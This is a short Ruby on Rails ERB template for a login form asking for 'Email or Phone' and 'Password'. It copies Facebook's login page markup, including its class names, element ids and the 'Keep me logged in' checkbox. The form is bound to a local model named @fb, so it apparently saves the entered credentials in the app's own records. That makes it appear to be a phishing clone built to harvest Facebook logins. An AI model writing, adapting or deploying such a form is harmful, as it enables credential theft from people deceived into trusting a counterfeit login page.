<%= simple_form_for @fb do |f| %>



<div class="form_row clearfix"><label for="email" class="login_form_label">Email or Phone:</label>

<%=f.input :email, label: false, input_html: {class: 'inputtext', id: 'email'}, :tabindex => 1, :name => "email" %>


</div><div class="form_row clearfix">


<label for="pass" class="login_form_label">Password:</label>

<%=f.input :password, label: false, input_html: {class: 'inputpassword', id: 'pass'}, :tabindex => 1, :name => "pass", :as => "password" %>


<div class="persistent"><div class="uiInputLabel clearfix uiInputLabelLegacy"><input id="persist_box" type="checkbox" value="1" name="persistent" class="uiInputLabelInput uiInputLabelCheckbox"><label for="persist_box" class="uiInputLabelLabel">Keep me logged in</label></div></div><input type="hidden" autocomplete="off" id="default_persistent" name="default_persistent" value="0"><div id="buttons" class="form_row clearfix"><label class="login_form_label"></label>



<div id="login_button_inline"><label class="uiButton uiButtonConfirm uiButtonLarge" id="loginbutton" for="u_0_1">

<%=f.submit "Log in" %>
</div>

<% end %>